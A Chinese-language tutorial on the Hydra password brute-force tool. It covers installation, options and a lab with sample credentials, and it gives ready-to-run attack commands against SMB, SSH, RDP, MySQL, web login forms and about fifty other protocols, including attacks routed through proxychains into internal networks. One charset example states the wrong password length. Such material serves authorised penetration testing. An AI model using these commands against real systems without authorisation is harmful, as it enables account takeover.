1.1Hydra简介
Hydra(九头蛇海德拉)是希腊神话之中的一个怪兽,以九个头闻名于世,因此常被称之为九头蛇,在Kali中hydray(hai der rua) 是默认被安装的,是一款由著名的黑客组织THC开发的开源暴力破解工具,支持大部分协议的在线密码破解,是网络安全·渗透测试必备的一款工具,目前支持的协议包括Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP。
Hydra目前最新版本为9.5,原始项目地址: https://github.com/vanhauser-thc/thc-hydra,其Windows实现版: https://github.com/maaaaz/thc-hydra-windows
1.下载及安装
(1)在Kali Linux上安装
Kali Linux已经预装了Hydra,但如果你想安装最新版本,可以使用以下命令:
sudo apt update
sudo apt install hydra
(2)源码安装
sudo apt update
sudo apt install build-essential libssl-dev libssh-dev libidn11-dev libpcre3-dev libffi-dev
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install
2.Hydra密码生成器
参数 | 介绍 |
-x MIN:MAX:CHARSET | 规则:MIN表示生成密码的最短长度;MAX表示生成密码的最长长度;CHARSET表示使用指定的字符生成密码,'a’表示所有的小写字母,'A’表示所有的大写字母,'1’表示所有的数字,对于其他字符,只需要添加在后面即可 |
-y | 使用方式见-x,它表示charset的字符是实际的字符,而不是正则表达式 |
-x 3:5:a | 生成的密码字典长度为3到5位,由所有的小写字母组成 |
-x 5:8:A1 | 生成的密码字典长度为5到8位,有所有的大写字母和数字组成 |
-x 5:5/%,.- | 生成的密码字典长度为5位,只由’/ % , . -'这5种字符构成 |
-x 3:5:aA1 -y | 生成的密码字典长度为3到5位,且只由’a A 1’这三种字符组成 |
-x 3:5:aA1.-+# | 生成的密码字典长度为3到8位,由大小写字母+数字+.-+#进行组合。 |
3.测试环境
(1)kali Linux操作系统
(2)Windows 2003 Server 192.168.199.130 Administrator domain2023
(3)Windows 2008 Server 192.168.199.131 simeon !QAZ2wsx
1.2Hydra基本命令、参数及常见使用
在kali中直接输入hydra即可看到详细信息。
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE|-x OPT -y]] | [-C FILE]] [-e nsr] [-u] [-f|-F] [-M FILE] [-o FILE] [-b FORMAT] [-t TASKS] [-T TASKS] [-w TIME] [-W TIME] [-m OPTIONS] [-s PORT] [-c TIME] [-S] [-O] [-4|6] [-I] [-vV] [-d] server service [OPTIONS]
1.常用参数
target: 要攻击的目标,可以是IPv4地址、IPv6地址或DNS名称。
service: 要攻击的服务,参见支持的协议列表。
OPTIONAL SERVICE PARAMETER: 一些模块有可选或必填的选项。输入
hydra -U <servicename>
获取特定服务的选项帮助。-R: 恢复先前中断的会话。需要存在一个
hydra.restore
文件。选项会被恢复,但可以在命令行中通过设置它们来更改。-S: 通过SSL连接。
-O: 使用旧的SSL v2和v3。
-s PORT: 如果服务在不同的默认端口上,定义端口号。
-l LOGIN 或 -L FILE: 使用LOGIN名称登录,或从FILE加载多个登录名。
-p PASS 或 -P FILE: 尝试密码PASS,或从FILE加载多个密码。
-x min:max:charset: 生成从min到max长度的密码。charset可以包含1(数字)、a(小写字母)和A(大写字母)。其他字符将被添加到列表中。例如:1:2:a1%。生成的密码长度为1到2,包含小写字母、数字和/或百分号和点。
-y: 禁用在-x暴力破解中使用符号,参见上述说明。
-e nsr: 额外的检查,"n" 表示尝试空密码,"s" 表示尝试用户名作为密码,"r" 表示尝试反向用户名作为密码。
-C FILE: 使用冒号分隔的 "login:pass" 格式,而不是 -L/-P 选项。
-u: 默认情况下,Hydra 会检查一个登录名的所有密码,然后尝试下一个登录名。此选项会使密码循环,即首先尝试所有登录名的第一个密码,然后是下一个密码。
-f: 在找到第一个登录/密码对后退出(如果使用 -M,则按主机)。
-F: 在找到第一个登录/密码对后退出(适用于任何主机,与 -M 一起使用)。
-M FILE: 并行攻击的服务器列表,每行一个条目。
-o FILE: 将找到的登录/密码对写入FILE,而不是标准输出。
-b FORMAT: 指定 -o FILE 的格式:text(默认)、json、jsonv1。
-t TASKS: 并行运行TASKS数量的连接(默认:16)。
-m OPTIONS: 模块特定选项。输入
hydra -U <module>
查看可用选项。-w TIME: 定义响应的最大等待时间(秒,默认:32)。
-W TIME: 定义每次连接之间的等待时间。这通常只在使用较低的任务数时有意义,例如 -t 1。
-c TIME: 每次登录尝试的等待时间(秒),适用于所有线程(推荐使用 -t 1)。这通常只在使用较低的任务数时有意义,例如 -t 1。
-4 / -6: 优先使用IPv4(默认)或IPv6地址。
-v / -V: 详细模式/显示每次尝试的登录+密码组合。
-d: 调试模式。
-I: 忽略现有的恢复文件(不等待10秒)。
-h, --help: 显示选项摘要。
2.常见示例
(1)破解smb
hydra -l Administrator -P pass.txt -t 16 192.168.199.130 smb
hydra -l simeon -P pass.txt -t 16 smb://192.168.199.131
hydra -L user.txt -P pass.txt -t 16 192.168.199.130 smb
(2)破解ssh
hydra -L user.txt -P pass.txt -t 10 -o save.log -vV 192.168.199.128 ssh
hydra -l kali -P pass.txt -t 10 -o save.log -vV ssh://192.168.199.128:22
(3)破解mysql
hydra -l root -P pass.txt mysql://192.168.31.195:3306
(4)破解远程终端
hydra -l simeon -P pass.txt rdp://192.168.199.131:3389 -V
hydra -l simeon -P pass.txt 192.168.199.131 rdp -V
3.图形破解xHydra
在kali下Hydra还存在一个xHydra版本,通过kali菜单-“05-Password Attacks”-“Online Attacks”-xhydra。即可打开xHydra图形界面。
(1)设置暴力破解的目标
在Target中可以设置单个IP地址,也可以选择IP地址文件,然后分别选择Port及Protocol,基于Mysql密码默认选择3306端口,协议为mysql即可。
(2)设置破解用户及密码字典
在xHydra中单击“Passwords”,然后设置Username为root,然后选择密码字典文件。
(3)运行及查看结果
单击start后,xHydra开始暴力破解,并展示结果,单击Save Output可以保存扫描的结果。
4.通过proxychains进行内网暴力破解
配置好proxychains后,然后在运行时增加proxychains即可。
proxychains hydra -l root -P pass.txt mysql://192.168.31.195:3306
1.3Hydra破解各种协议示例
1. adam6500
hydra -l admin -P passwords.txt adam6500://192.168.0.1
2. afp
hydra -l admin -P passwords.txt afp://192.168.0.1
3. asterisk
hydra -l admin -P passwords.txt asterisk://192.168.0.1
4. cisco
hydra -l admin -P passwords.txt cisco://192.168.0.1
5. cisco-enable
hydra -l admin -P passwords.txt cisco-enable://192.168.0.1
6. cvs
hydra -l admin -P passwords.txt cvs://192.168.0.1
7. firebird
hydra -l admin -P passwords.txt firebird://192.168.0.1
8. ftp
hydra -l admin -P passwords.txt ftp://192.168.0.1
hydra -l admin -P passwords.txt ftps://192.168.0.1
hydra ftp://192.168.0.1 -L user.txt -P pass.txt -t 10 -vV
9. ftps
hydra -l admin -P passwords.txt ftps://192.168.0.1
10. http(s)-{head|get|post}
hydra -l admin -P passwords.txt http-get //192.168.0.1
hydra -l admin -P passwords.txt https-get //192.168.0.1
hydra -l admin -P passwords.txt http-post //192.168.0.1
hydra -l admin -P passwords.txt https-post //192.168.0.1
hydra -l admin -P passwords.txt http-head //192.168.0.1
hydra -l admin -P passwords.txt https-head //192.168.0.1
hydra -m /admin -L user.txt -P pass.txt 192.168.0.1 https
11. http(s)-{get|post}-form
hydra -l admin -P passwords.txt http-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed" 192.168.0.1
hydra -l admin -P passwords.txt https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed" 192.168.0.1
hydra -t 3 -L user.txt -P pass.txt -o out.txt -f 192.168.0.1-s 8888 http-post-form "/:id=^USER^&passwd=^PASS^:wrong username or password"
12. http-proxy
hydra -l admin -P passwords.txt http-proxy //192.168.0.1
13. http-proxy-urlenum
hydra -l admin -P passwords.txt http-proxy-urlenum //192.168.0.1
14. icq
hydra -l admin -P passwords.txt icq://192.168.0.1
15. imap(s)
hydra -l admin -P passwords.txt imap://192.168.0.1
hydra -l admin -P passwords.txt imaps://192.168.0.1
16. irc
hydra -l admin -P passwords.txt irc://192.168.0.1
17. ldap2(s)
hydra -l admin -P passwords.txt ldap2://192.168.0.1
hydra -l admin -P passwords.txt ldap2s://192.168.0.1
18. ldap3[-{cram|digest}md5][s]
hydra -l admin -P passwords.txt ldap3-crammd5://192.168.0.1
hydra -l admin -P passwords.txt ldap3-digestmd5://192.168.0.1
hydra -l admin -P passwords.txt ldap3-crammd5s://192.168.0.1
hydra -l admin -P passwords.txt ldap3-digestmd5s://192.168.0.1
19. mssql
hydra -l admin -P passwords.txt mssql://192.168.0.1
20. mysql(v4)
hydra -l admin -P passwords.txt mysql4://192.168.0.1
21. mysql5
hydra -l admin -P passwords.txt mysql5://192.168.0.1
22. ncp
hydra -l admin -P passwords.txt ncp://192.168.0.1
23. nntp
hydra -l admin -P passwords.txt nntp://192.168.0.1
24. oracle
hydra -l admin -P passwords.txt oracle://192.168.0.1
25. oracle-listener
hydra -l admin -P passwords.txt oracle-listener://192.168.0.1
26. oracle-sid
hydra -l admin -P passwords.txt oracle-sid://192.168.0.1
27. pcanywhere
hydra -l admin -P passwords.txt pcanywhere://192.168.0.1
28. pcnfs
hydra -l admin -P passwords.txt pcnfs://192.168.0.1
29. pop3(s)
hydra -l admin -P passwords.txt pop3://192.168.0.1
hydra -l admin -P passwords.txt pop3s://192.168.0.1
30. postgres
hydra -l admin -P passwords.txt postgres://192.168.0.1
31. rdp
hydra -l admin -P passwords.txt rdp://192.168.0.1
hydra 192.168.0.1 rdp -l administrator -P pass.txt -V
32. radmin2
hydra -l admin -P passwords.txt radmin2://192.168.0.1
33. redis
hydra -l admin -P passwords.txt redis://192.168.0.1
34. rexec
hydra -l admin -P passwords.txt rexec://192.168.0.1
35. rlogin
hydra -l admin -P passwords.txt rlogin://192.168.0.1
36. rpcap
hydra -l admin -P passwords.txt rpcap://192.168.0.1
37. rsh
hydra -l admin -P passwords.txt rsh://192.168.0.1
38. rtsp
hydra -l admin -P passwords.txt rtsp://192.168.0.1
39. s7-300
hydra -l admin -P passwords.txt s7-300://192.168.0.1
40. sapr3
hydra -l admin -P passwords.txt sapr3://192.168.0.1
41. sip
hydra -l admin -P passwords.txt sip://192.168.0.1
42. smb
hydra -l admin -P passwords.txt smb://192.168.0.1
43. smtp(s)
hydra -l admin -P passwords.txt smtp://192.168.0.1
hydra -l admin -P passwords.txt smtps://192.168.0.1
44. smtp-enum
hydra -l admin -P passwords.txt smtp-enum://192.168.0.1
45. snmp
hydra -l admin -P passwords.txt snmp://192.168.0.1
46. socks5
hydra -l admin -P passwords.txt socks5://192.168.0.1
47. ssh
hydra -l admin -P passwords.txt ssh://192.168.0.1
48. sshkey
hydra -l admin -P passwords.txt sshkey://192.168.0.1
49. svn
hydra -l admin -P passwords.txt svn://192.168.0.1
50. teamspeak
hydra -l admin -P passwords.txt teamspeak://192.168.0.1
51. telnet(s)
hydra -l admin -P passwords.txt telnet://192.168.0.1
hydra -l admin -P passwords.txt telnets://192.168.0.1
52. vmauthd
hydra -l admin -P passwords.txt vmauthd://192.168.0.1
53. vnc
hydra -l admin -P passwords.txt vnc://192.168.0.1
54. xmpp
hydra -l admin -P passwords.txt xmpp://192.168.0.1
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...